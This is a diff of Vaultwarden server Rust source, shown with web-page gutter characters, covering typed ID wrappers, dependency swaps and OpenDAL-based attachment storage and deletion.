semver::VersionReq::parse(&web_vault_version).expect("Invalid web-vault version compare string").matches(&WEB_VAULT_VERSION)
|
||||||
|
);
|
||||||
|
handlebars::handlebars_helper!(vwver: | vw_version: String |
|
||||||
|
semver::VersionReq::parse(&vw_version).expect("Invalid Vaultwarden version compare string").matches(&VW_VERSION)
|
||||||
|
);
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ use std::num::NonZeroU32;
|
|||||||
use data_encoding::{Encoding, HEXLOWER};
|
use data_encoding::{Encoding, HEXLOWER};
|
||||||
use ring::{digest, hmac, pbkdf2};
|
use ring::{digest, hmac, pbkdf2};
|
||||||
|
|
||||||
static DIGEST_ALG: pbkdf2::Algorithm = pbkdf2::PBKDF2_HMAC_SHA256;
|
const DIGEST_ALG: pbkdf2::Algorithm = pbkdf2::PBKDF2_HMAC_SHA256;
|
||||||
const OUTPUT_LEN: usize = digest::SHA256_OUTPUT_LEN;
|
const OUTPUT_LEN: usize = digest::SHA256_OUTPUT_LEN;
|
||||||
|
|
||||||
pub fn hash_password(secret: &[u8], salt: &[u8], iterations: u32) -> Vec<u8> {
|
pub fn hash_password(secret: &[u8], salt: &[u8], iterations: u32) -> Vec<u8> {
|
||||||
@@ -56,11 +56,11 @@ pub fn encode_random_bytes<const N: usize>(e: Encoding) -> String {
|
|||||||
pub fn get_random_string(alphabet: &[u8], num_chars: usize) -> String {
|
pub fn get_random_string(alphabet: &[u8], num_chars: usize) -> String {
|
||||||
// Ref: https://rust-lang-nursery.github.io/rust-cookbook/algorithms/randomness.html
|
// Ref: https://rust-lang-nursery.github.io/rust-cookbook/algorithms/randomness.html
|
||||||
use rand::Rng;
|
use rand::Rng;
|
||||||
let mut rng = rand::thread_rng();
|
let mut rng = rand::rng();
|
||||||
|
|
||||||
(0..num_chars)
|
(0..num_chars)
|
||||||
.map(|_| {
|
.map(|_| {
|
||||||
let i = rng.gen_range(0..alphabet.len());
|
let i = rng.random_range(0..alphabet.len());
|
||||||
alphabet[i] as char
|
alphabet[i] as char
|
||||||
})
|
})
|
||||||
.collect()
|
.collect()
|
||||||
@@ -84,14 +84,15 @@ pub fn generate_id<const N: usize>() -> String {
|
|||||||
encode_random_bytes::<N>(HEXLOWER)
|
encode_random_bytes::<N>(HEXLOWER)
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_send_id() -> String {
|
pub fn generate_send_file_id() -> String {
|
||||||
// Send IDs are globally scoped, so make them longer to avoid collisions.
|
// Send File IDs are globally scoped, so make them longer to avoid collisions.
|
||||||
generate_id::<32>() // 256 bits
|
generate_id::<32>() // 256 bits
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_attachment_id() -> String {
|
use crate::db::models::AttachmentId;
|
||||||
|
pub fn generate_attachment_id() -> AttachmentId {
|
||||||
// Attachment IDs are scoped to a cipher, so they can be smaller.
|
// Attachment IDs are scoped to a cipher, so they can be smaller.
|
||||||
generate_id::<10>() // 80 bits
|
AttachmentId(generate_id::<10>()) // 80 bits
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Generates a numeric token for email-based verifications.
|
/// Generates a numeric token for email-based verifications.
|
||||||
@@ -109,7 +110,6 @@ pub fn generate_api_key() -> String {
|
|||||||
// Constant time compare
|
// Constant time compare
|
||||||
//
|
//
|
||||||
pub fn ct_eq<T: AsRef<[u8]>, U: AsRef<[u8]>>(a: T, b: U) -> bool {
|
pub fn ct_eq<T: AsRef<[u8]>, U: AsRef<[u8]>>(a: T, b: U) -> bool {
|
||||||
use ring::constant_time::verify_slices_are_equal;
|
use subtle::ConstantTimeEq;
|
||||||
|
a.as_ref().ct_eq(b.as_ref()).into()
|
||||||
verify_slices_are_equal(a.as_ref(), b.as_ref()).is_ok()
|
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -130,7 +130,7 @@ macro_rules! generate_connections {
|
|||||||
DbConnType::$name => {
|
DbConnType::$name => {
|
||||||
#[cfg($name)]
|
#[cfg($name)]
|
||||||
{
|
{
|
||||||
paste::paste!{ [< $name _migrations >]::run_migrations()?; }
|
pastey::paste!{ [< $name _migrations >]::run_migrations()?; }
|
||||||
let manager = ConnectionManager::new(&url);
|
let manager = ConnectionManager::new(&url);
|
||||||
let pool = Pool::builder()
|
let pool = Pool::builder()
|
||||||
.max_size(CONFIG.database_max_conns())
|
.max_size(CONFIG.database_max_conns())
|
||||||
@@ -259,7 +259,7 @@ macro_rules! db_run {
|
|||||||
$($(
|
$($(
|
||||||
#[cfg($db)]
|
#[cfg($db)]
|
||||||
$crate::db::DbConnInner::$db($conn) => {
|
$crate::db::DbConnInner::$db($conn) => {
|
||||||
paste::paste! {
|
pastey::paste! {
|
||||||
#[allow(unused)] use $crate::db::[<__ $db _schema>]::{self as schema, *};
|
#[allow(unused)] use $crate::db::[<__ $db _schema>]::{self as schema, *};
|
||||||
#[allow(unused)] use [<__ $db _model>]::*;
|
#[allow(unused)] use [<__ $db _model>]::*;
|
||||||
}
|
}
|
||||||
@@ -280,7 +280,7 @@ macro_rules! db_run {
|
|||||||
$($(
|
$($(
|
||||||
#[cfg($db)]
|
#[cfg($db)]
|
||||||
$crate::db::DbConnInner::$db($conn) => {
|
$crate::db::DbConnInner::$db($conn) => {
|
||||||
paste::paste! {
|
pastey::paste! {
|
||||||
#[allow(unused)] use $crate::db::[<__ $db _schema>]::{self as schema, *};
|
#[allow(unused)] use $crate::db::[<__ $db _schema>]::{self as schema, *};
|
||||||
// @ RAW: #[allow(unused)] use [<__ $db _model>]::*;
|
// @ RAW: #[allow(unused)] use [<__ $db _model>]::*;
|
||||||
}
|
}
|
||||||
@@ -300,19 +300,17 @@ pub trait FromDb {
|
|||||||
|
|
||||||
impl<T: FromDb> FromDb for Vec<T> {
|
impl<T: FromDb> FromDb for Vec<T> {
|
||||||
type Output = Vec<T::Output>;
|
type Output = Vec<T::Output>;
|
||||||
#[allow(clippy::wrong_self_convention)]
|
|
||||||
#[inline(always)]
|
#[inline(always)]
|
||||||
fn from_db(self) -> Self::Output {
|
fn from_db(self) -> Self::Output {
|
||||||
self.into_iter().map(crate::db::FromDb::from_db).collect()
|
self.into_iter().map(FromDb::from_db).collect()
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
impl<T: FromDb> FromDb for Option<T> {
|
impl<T: FromDb> FromDb for Option<T> {
|
||||||
type Output = Option<T::Output>;
|
type Output = Option<T::Output>;
|
||||||
#[allow(clippy::wrong_self_convention)]
|
|
||||||
#[inline(always)]
|
#[inline(always)]
|
||||||
fn from_db(self) -> Self::Output {
|
fn from_db(self) -> Self::Output {
|
||||||
self.map(crate::db::FromDb::from_db)
|
self.map(FromDb::from_db)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -339,7 +337,7 @@ macro_rules! db_object {
|
|||||||
};
|
};
|
||||||
|
|
||||||
( @db $db:ident | $( #[$attr:meta] )* | $name:ident | $( $( #[$field_attr:meta] )* $vis:vis $field:ident : $typ:ty),+) => {
|
( @db $db:ident | $( #[$attr:meta] )* | $name:ident | $( $( #[$field_attr:meta] )* $vis:vis $field:ident : $typ:ty),+) => {
|
||||||
paste::paste! {
|
pastey::paste! {
|
||||||
#[allow(unused)] use super::*;
|
#[allow(unused)] use super::*;
|
||||||
#[allow(unused)] use diesel::prelude::*;
|
#[allow(unused)] use diesel::prelude::*;
|
||||||
#[allow(unused)] use $crate::db::[<__ $db _schema>]::*;
|
#[allow(unused)] use $crate::db::[<__ $db _schema>]::*;
|
||||||
@@ -368,19 +366,21 @@ pub mod models;
|
|||||||
|
|
||||||
/// Creates a back-up of the sqlite database
|
/// Creates a back-up of the sqlite database
|
||||||
/// MySQL/MariaDB and PostgreSQL are not supported.
|
/// MySQL/MariaDB and PostgreSQL are not supported.
|
||||||
pub async fn backup_database(conn: &mut DbConn) -> Result<(), Error> {
|
pub async fn backup_database(conn: &mut DbConn) -> Result<String, Error> {
|
||||||
db_run! {@raw conn:
|
db_run! {@raw conn:
|
||||||
postgresql, mysql {
|
postgresql, mysql {
|
||||||
let _ = conn;
|
let _ = conn;
|
||||||
err!("PostgreSQL and MySQL/MariaDB do not support this backup feature");
|
err!("PostgreSQL and MySQL/MariaDB do not support this backup feature");
|
||||||
}
|
}
|
||||||
sqlite {
|
sqlite {
|
||||||
use std::path::Path;
|
|
||||||
let db_url = CONFIG.database_url();
|
let db_url = CONFIG.database_url();
|
||||||
let db_path = Path::new(&db_url).parent().unwrap().to_string_lossy();
|
let db_path = std::path::Path::new(&db_url).parent().unwrap();
|
||||||
let file_date = chrono::Utc::now().format("%Y%m%d_%H%M%S").to_string();
|
let backup_file = db_path
|
||||||
diesel::sql_query(format!("VACUUM INTO '{db_path}/db_{file_date}.sqlite3'")).execute(conn)?;
|
.join(format!("db_{}.sqlite3", chrono::Utc::now().format("%Y%m%d_%H%M%S")))
|
||||||
Ok(())
|
.to_string_lossy()
|
||||||
|
.into_owned();
|
||||||
|
diesel::sql_query(format!("VACUUM INTO '{backup_file}'")).execute(conn)?;
|
||||||
|
Ok(backup_file)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -389,13 +389,13 @@ pub async fn backup_database(conn: &mut DbConn) -> Result<(), Error> {
|
|||||||
pub async fn get_sql_server_version(conn: &mut DbConn) -> String {
|
pub async fn get_sql_server_version(conn: &mut DbConn) -> String {
|
||||||
db_run! {@raw conn:
|
db_run! {@raw conn:
|
||||||
postgresql, mysql {
|
postgresql, mysql {
|
||||||
sql_function!{
|
define_sql_function!{
|
||||||
fn version() -> diesel::sql_types::Text;
|
fn version() -> diesel::sql_types::Text;
|
||||||
}
|
}
|
||||||
diesel::select(version()).get_result::<String>(conn).unwrap_or_else(|_| "Unknown".to_string())
|
diesel::select(version()).get_result::<String>(conn).unwrap_or_else(|_| "Unknown".to_string())
|
||||||
}
|
}
|
||||||
sqlite {
|
sqlite {
|
||||||
sql_function!{
|
define_sql_function!{
|
||||||
fn sqlite_version() -> diesel::sql_types::Text;
|
fn sqlite_version() -> diesel::sql_types::Text;
|
||||||
}
|
}
|
||||||
diesel::select(sqlite_version()).get_result::<String>(conn).unwrap_or_else(|_| "Unknown".to_string())
|
diesel::select(sqlite_version()).get_result::<String>(conn).unwrap_or_else(|_| "Unknown".to_string())
|
||||||
|
|||||||
@@ -1,9 +1,12 @@
|
|||||||
use std::io::ErrorKind;
|
use std::time::Duration;
|
||||||
|
|
||||||
use bigdecimal::{BigDecimal, ToPrimitive};
|
use bigdecimal::{BigDecimal, ToPrimitive};
|
||||||
|
use derive_more::{AsRef, Deref, Display};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::CONFIG;
|
use super::{CipherId, OrganizationId, UserId};
|
||||||
|
use crate::{config::PathType, CONFIG};
|
||||||
|
use macros::IdFromParam;
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
@@ -11,8 +14,8 @@ db_object! {
|
|||||||
#[diesel(treat_none_as_null = true)]
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(id))]
|
#[diesel(primary_key(id))]
|
||||||
pub struct Attachment {
|
pub struct Attachment {
|
||||||
pub id: String,
|
pub id: AttachmentId,
|
||||||
pub cipher_uuid: String,
|
pub cipher_uuid: CipherId,
|
||||||
pub file_name: String, // encrypted
|
pub file_name: String, // encrypted
|
||||||
pub file_size: i64,
|
pub file_size: i64,
|
||||||
pub akey: Option<String>,
|
pub akey: Option<String>,
|
||||||
@@ -21,7 +24,13 @@ db_object! {
|
|||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl Attachment {
|
impl Attachment {
|
||||||
pub const fn new(id: String, cipher_uuid: String, file_name: String, file_size: i64, akey: Option<String>) -> Self {
|
pub const fn new(
|
||||||
|
id: AttachmentId,
|
||||||
|
cipher_uuid: CipherId,
|
||||||
|
file_name: String,
|
||||||
|
file_size: i64,
|
||||||
|
akey: Option<String>,
|
||||||
|
) -> Self {
|
||||||
Self {
|
Self {
|
||||||
id,
|
id,
|
||||||
cipher_uuid,
|
cipher_uuid,
|
||||||
@@ -32,24 +41,30 @@ impl Attachment {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub fn get_file_path(&self) -> String {
|
pub fn get_file_path(&self) -> String {
|
||||||
format!("{}/{}/{}", CONFIG.attachments_folder(), self.cipher_uuid, self.id)
|
format!("{}/{}", self.cipher_uuid, self.id)
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn get_url(&self, host: &str) -> String {
|
pub async fn get_url(&self, host: &str) -> Result<String, crate::Error> {
|
||||||
let token = encode_jwt(&generate_file_download_claims(self.cipher_uuid.clone(), self.id.clone()));
|
let operator = CONFIG.opendal_operator_for_path_type(PathType::Attachments)?;
|
||||||
format!("{}/attachments/{}/{}?token={}", host, self.cipher_uuid, self.id, token)
|
|
||||||
|
if operator.info().scheme() == opendal::Scheme::Fs {
|
||||||
|
let token = encode_jwt(&generate_file_download_claims(self.cipher_uuid.clone(), self.id.clone()));
|
||||||
|
Ok(format!("{host}/attachments/{}/{}?token={token}", self.cipher_uuid, self.id))
|
||||||
|
} else {
|
||||||
|
Ok(operator.presign_read(&self.get_file_path(), Duration::from_secs(5 * 60)).await?.uri().to_string())
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn to_json(&self, host: &str) -> Value {
|
pub async fn to_json(&self, host: &str) -> Result<Value, crate::Error> {
|
||||||
json!({
|
Ok(json!({
|
||||||
"Id": self.id,
|
"id": self.id,
|
||||||
"Url": self.get_url(host),
|
"url": self.get_url(host).await?,
|
||||||
"FileName": self.file_name,
|
"fileName": self.file_name,
|
||||||
"Size": self.file_size.to_string(),
|
"size": self.file_size.to_string(),
|
||||||
"SizeName": crate::util::get_display_size(self.file_size),
|
"sizeName": crate::util::get_display_size(self.file_size),
|
||||||
"Key": self.akey,
|
"key": self.akey,
|
||||||
"Object": "attachment"
|
"object": "attachment"
|
||||||
})
|
}))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -99,32 +114,32 @@ impl Attachment {
|
|||||||
|| diesel::delete(attachments::table.filter(attachments::id.eq(&self.id))).execute(conn),
|
|| diesel::delete(attachments::table.filter(attachments::id.eq(&self.id))).execute(conn),
|
||||||
10,
|
10,
|
||||||
)
|
)
|
||||||
.map_res("Error deleting attachment")?;
|
.map(|_| ())
|
||||||
|
.map_res("Error deleting attachment")
|
||||||
|
}}?;
|
||||||
|
|
||||||
let file_path = &self.get_file_path();
|
let operator = CONFIG.opendal_operator_for_path_type(PathType::Attachments)?;
|
||||||
|
let file_path = self.get_file_path();
|
||||||
|
|
||||||
match crate::util::delete_file(file_path) {
|
if let Err(e) = operator.delete(&file_path).await {
|
||||||
// Ignore "file not found" errors. This can happen when the
|
if e.kind() == opendal::ErrorKind::NotFound {
|
||||||
// upstream caller has already cleaned up the file as part of
|
debug!("File '{file_path}' already deleted.");
|
||||||
// its own error handling.
|
} else {
|
||||||
Err(e) if e.kind() == ErrorKind::NotFound => {
|
return Err(e.into());
|
||||||
debug!("File '{}' already deleted.", file_path);
|
|
||||||
Ok(())
|
|
||||||
}
|
|
||||||
Err(e) => Err(e.into()),
|
|
||||||
_ => Ok(()),
|
|
||||||
}
|
}
|
||||||
}}
|
}
|
||||||
|
|
||||||
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for attachment in Attachment::find_by_cipher(cipher_uuid, conn).await {
|
for attachment in Attachment::find_by_cipher(cipher_uuid, conn).await {
|
||||||
attachment.delete(conn).await?;
|
attachment.delete(conn).await?;
|
||||||
}
|
}
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_id(id: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_id(id: &AttachmentId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
attachments::table
|
attachments::table
|
||||||
.filter(attachments::id.eq(id.to_lowercase()))
|
.filter(attachments::id.eq(id.to_lowercase()))
|
||||||
@@ -134,7 +149,7 @@ impl Attachment {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
attachments::table
|
attachments::table
|
||||||
.filter(attachments::cipher_uuid.eq(cipher_uuid))
|
.filter(attachments::cipher_uuid.eq(cipher_uuid))
|
||||||
@@ -144,7 +159,7 @@ impl Attachment {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn size_by_user(user_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn size_by_user(user_uuid: &UserId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
let result: Option<BigDecimal> = attachments::table
|
let result: Option<BigDecimal> = attachments::table
|
||||||
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
||||||
@@ -161,7 +176,7 @@ impl Attachment {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn count_by_user(user_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn count_by_user(user_uuid: &UserId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
attachments::table
|
attachments::table
|
||||||
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
||||||
@@ -172,7 +187,7 @@ impl Attachment {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn size_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn size_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
let result: Option<BigDecimal> = attachments::table
|
let result: Option<BigDecimal> = attachments::table
|
||||||
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
||||||
@@ -189,7 +204,7 @@ impl Attachment {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn count_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
attachments::table
|
attachments::table
|
||||||
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
||||||
@@ -203,7 +218,11 @@ impl Attachment {
|
|||||||
// This will return all attachments linked to the user or org
|
// This will return all attachments linked to the user or org
|
||||||
// There is no filtering done here if the user actually has access!
|
// There is no filtering done here if the user actually has access!
|
||||||
// It is used to speed up the sync process, and the matching is done in a different part.
|
// It is used to speed up the sync process, and the matching is done in a different part.
|
||||||
pub async fn find_all_by_user_and_orgs(user_uuid: &str, org_uuids: &Vec<String>, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_all_by_user_and_orgs(
|
||||||
|
user_uuid: &UserId,
|
||||||
|
org_uuids: &Vec<OrganizationId>,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
attachments::table
|
attachments::table
|
||||||
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
.left_join(ciphers::table.on(ciphers::uuid.eq(attachments::cipher_uuid)))
|
||||||
@@ -216,3 +235,20 @@ impl Attachment {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
IdFromParam,
|
||||||
|
)]
|
||||||
|
pub struct AttachmentId(pub String);
|
||||||
|
|||||||
@@ -1,5 +1,9 @@
|
|||||||
use crate::crypto::ct_eq;
|
use super::{DeviceId, OrganizationId, UserId};
|
||||||
|
use crate::{crypto::ct_eq, util::format_date};
|
||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
|
use derive_more::{AsRef, Deref, Display, From};
|
||||||
|
use macros::UuidFromParam;
|
||||||
|
use serde_json::Value;
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Debug, Identifiable, Queryable, Insertable, AsChangeset, Deserialize, Serialize)]
|
#[derive(Debug, Identifiable, Queryable, Insertable, AsChangeset, Deserialize, Serialize)]
|
||||||
@@ -7,15 +11,15 @@ db_object! {
|
|||||||
#[diesel(treat_none_as_null = true)]
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct AuthRequest {
|
pub struct AuthRequest {
|
||||||
pub uuid: String,
|
pub uuid: AuthRequestId,
|
||||||
pub user_uuid: String,
|
pub user_uuid: UserId,
|
||||||
pub organization_uuid: Option<String>,
|
pub organization_uuid: Option<OrganizationId>,
|
||||||
|
|
||||||
pub request_device_identifier: String,
|
pub request_device_identifier: DeviceId,
|
||||||
pub device_type: i32, // https://github.com/bitwarden/server/blob/master/src/Core/Enums/DeviceType.cs
|
pub device_type: i32, // https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/Enums/DeviceType.cs
|
||||||
|
|
||||||
pub request_ip: String,
|
pub request_ip: String,
|
||||||
pub response_device_id: Option<String>,
|
pub response_device_id: Option<DeviceId>,
|
||||||
|
|
||||||
pub access_code: String,
|
pub access_code: String,
|
||||||
pub public_key: String,
|
pub public_key: String,
|
||||||
@@ -33,8 +37,8 @@ db_object! {
|
|||||||
|
|
||||||
impl AuthRequest {
|
impl AuthRequest {
|
||||||
pub fn new(
|
pub fn new(
|
||||||
user_uuid: String,
|
user_uuid: UserId,
|
||||||
request_device_identifier: String,
|
request_device_identifier: DeviceId,
|
||||||
device_type: i32,
|
device_type: i32,
|
||||||
request_ip: String,
|
request_ip: String,
|
||||||
access_code: String,
|
access_code: String,
|
||||||
@@ -43,7 +47,7 @@ impl AuthRequest {
|
|||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: AuthRequestId(crate::util::get_uuid()),
|
||||||
user_uuid,
|
user_uuid,
|
||||||
organization_uuid: None,
|
organization_uuid: None,
|
||||||
|
|
||||||
@@ -61,6 +65,13 @@ impl AuthRequest {
|
|||||||
authentication_date: None,
|
authentication_date: None,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub fn to_json_for_pending_device(&self) -> Value {
|
||||||
|
json!({
|
||||||
|
"id": self.uuid,
|
||||||
|
"creationDate": format_date(&self.creation_date),
|
||||||
|
})
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
use crate::db::DbConn;
|
use crate::db::DbConn;
|
||||||
@@ -101,7 +112,7 @@ impl AuthRequest {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid(uuid: &AuthRequestId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
auth_requests::table
|
auth_requests::table
|
||||||
.filter(auth_requests::uuid.eq(uuid))
|
.filter(auth_requests::uuid.eq(uuid))
|
||||||
@@ -111,7 +122,18 @@ impl AuthRequest {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_uuid_and_user(uuid: &AuthRequestId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
|
||||||
|
db_run! {conn: {
|
||||||
|
auth_requests::table
|
||||||
|
.filter(auth_requests::uuid.eq(uuid))
|
||||||
|
.filter(auth_requests::user_uuid.eq(user_uuid))
|
||||||
|
.first::<AuthRequestDb>(conn)
|
||||||
|
.ok()
|
||||||
|
.from_db()
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
auth_requests::table
|
auth_requests::table
|
||||||
.filter(auth_requests::user_uuid.eq(user_uuid))
|
.filter(auth_requests::user_uuid.eq(user_uuid))
|
||||||
@@ -119,6 +141,21 @@ impl AuthRequest {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn find_by_user_and_requested_device(
|
||||||
|
user_uuid: &UserId,
|
||||||
|
device_uuid: &DeviceId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
|
db_run! {conn: {
|
||||||
|
auth_requests::table
|
||||||
|
.filter(auth_requests::user_uuid.eq(user_uuid))
|
||||||
|
.filter(auth_requests::request_device_identifier.eq(device_uuid))
|
||||||
|
.filter(auth_requests::approved.is_null())
|
||||||
|
.order_by(auth_requests::creation_date.desc())
|
||||||
|
.first::<AuthRequestDb>(conn).ok().from_db()
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
pub async fn find_created_before(dt: &NaiveDateTime, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_created_before(dt: &NaiveDateTime, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
auth_requests::table
|
auth_requests::table
|
||||||
@@ -140,9 +177,27 @@ impl AuthRequest {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn purge_expired_auth_requests(conn: &mut DbConn) {
|
pub async fn purge_expired_auth_requests(conn: &mut DbConn) {
|
||||||
let expiry_time = Utc::now().naive_utc() - chrono::Duration::minutes(5); //after 5 minutes, clients reject the request
|
let expiry_time = Utc::now().naive_utc() - chrono::TimeDelta::try_minutes(5).unwrap(); //after 5 minutes, clients reject the request
|
||||||
for auth_request in Self::find_created_before(&expiry_time, conn).await {
|
for auth_request in Self::find_created_before(&expiry_time, conn).await {
|
||||||
auth_request.delete(conn).await.ok();
|
auth_request.delete(conn).await.ok();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
pub struct AuthRequestId(String);
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -1,15 +1,21 @@
|
|||||||
|
use derive_more::{AsRef, Deref, Display, From};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use super::{CollectionGroup, User, UserOrgStatus, UserOrgType, UserOrganization};
|
use super::{
|
||||||
|
CipherId, CollectionGroup, GroupUser, Membership, MembershipId, MembershipStatus, MembershipType, OrganizationId,
|
||||||
|
User, UserId,
|
||||||
|
};
|
||||||
use crate::CONFIG;
|
use crate::CONFIG;
|
||||||
|
use macros::UuidFromParam;
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
#[diesel(table_name = collections)]
|
#[diesel(table_name = collections)]
|
||||||
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct Collection {
|
pub struct Collection {
|
||||||
pub uuid: String,
|
pub uuid: CollectionId,
|
||||||
pub org_uuid: String,
|
pub org_uuid: OrganizationId,
|
||||||
pub name: String,
|
pub name: String,
|
||||||
pub external_id: Option<String>,
|
pub external_id: Option<String>,
|
||||||
}
|
}
|
||||||
@@ -18,26 +24,27 @@ db_object! {
|
|||||||
#[diesel(table_name = users_collections)]
|
#[diesel(table_name = users_collections)]
|
||||||
#[diesel(primary_key(user_uuid, collection_uuid))]
|
#[diesel(primary_key(user_uuid, collection_uuid))]
|
||||||
pub struct CollectionUser {
|
pub struct CollectionUser {
|
||||||
pub user_uuid: String,
|
